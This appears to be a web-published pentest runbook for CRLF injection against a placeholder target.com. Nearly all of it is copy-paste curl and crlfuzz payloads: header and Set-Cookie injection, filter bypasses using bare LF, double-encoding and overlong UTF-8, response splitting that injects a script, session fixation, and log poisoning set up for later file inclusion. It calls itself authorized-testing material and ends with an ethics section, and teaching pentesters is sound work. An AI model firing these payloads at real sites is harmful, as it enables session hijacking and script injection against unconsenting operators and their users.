Webupdated Oct 1, 2026
CRLF (%0D%0A) Injection
Injecting carriage return and line feed to split HTTP responses, set headers, fixate sessions, poison logs, and bypass weak encoding filters.
toolbox:burp suitecurl
A CRLF injection runbook for authorized pentests / bug bounty on in-scope targets only. Goal: land \r\n inside a header or redirect value and prove header injection or response splitting with a visible marker.
1. Find reflection points
CRLF lives in redirect targets, Location values, cookie names, custom headers, and any parameter echoed into headers.
# Baseline redirect behavior
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home"
# Try a literal CRLF pair in the parameter
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0aX-Injected:%20yes" \
| grep -i "x-injected"
2. Confirm header injection
# Inject a response header you can spot
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0aX-CRLF:%20hit" \
| grep -i "x-crlf"
# Inject a Set-Cookie
curl -s -D - -o /dev/null \
"https://target.com/redirect?url=/home%0d%0aSet-Cookie:%20crlf=1" \
| grep -i "set-cookie: crlf"
3. Bypass naive filters
Filters often strip %0d%0a literally but miss double-encoding, overlong UTF-8, or bare %0a.
# Bare LF
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0aX-CRLF:%20hit" | grep -i x-crlf
# Double-encoded
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%250d%250aX-CRLF:%20hit" | grep -i x-crlf
# Overlong / unicode newline variants
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%E5%98%8A%E5%98%8DX-CRLF:%20hit" | grep -i x-crlf
# Combination tricks
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0a%20X-CRLF:%20hit" | grep -i x-crlf
4. Response splitting
Two CRLFs terminate the header block, letting you start a new response body.
# Body injection after a full header break
curl -s -D - "https://target.com/redirect?url=/home%0d%0a%0d%0a<script>alert(1)</script>"
# Split into a second status line
curl -s -D - "https://target.com/redirect?url=/home%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0aowned"
5. Automated sweep
crlfuzz -u "https://target.com/redirect?url=/home" -w
crlfuzz -l urls.txt -w -o crlf.txt
6. Impact checks
# Session fixation via injected Set-Cookie
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0aSet-Cookie:%20session=ATTACKER" | grep -i set-cookie
# Log poisoning setup (pair with LFI in a later step)
curl -s -A "Mozilla%0d%0aINJECTED-AGENT" "https://target.com/"
Full pipeline
# 1. Baseline and simple injection
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home"
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0aX-CRLF:%20hit" | grep -i x-crlf
# 2. Filter bypasses
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0aX-CRLF:%20hit" | grep -i x-crlf
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%250d%250aX-CRLF:%20hit" | grep -i x-crlf
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%E5%98%8A%E5%98%8DX-CRLF:%20hit" | grep -i x-crlf
# 3. Response splitting
curl -s -D - "https://target.com/redirect?url=/home%0d%0a%0d%0a<script>alert(1)</script>"
# 4. Automated sweep
crlfuzz -u "https://target.com/redirect?url=/home" -w
crlfuzz -l urls.txt -w -o crlf.txt
# 5. Session fixation proof
curl -s -D - -o /dev/null "https://target.com/redirect?url=/home%0d%0aSet-Cookie:%20session=ATTACKER" | grep -i set-cookie
Ethics & legality
- Only inject into endpoints within the authorized scope.
- Do not use injected cookies to hijack real users; demonstrate with your own session.
- Keep response-splitting payloads benign (an alert or static marker).
- Retain the raw response showing the injected header as evidence.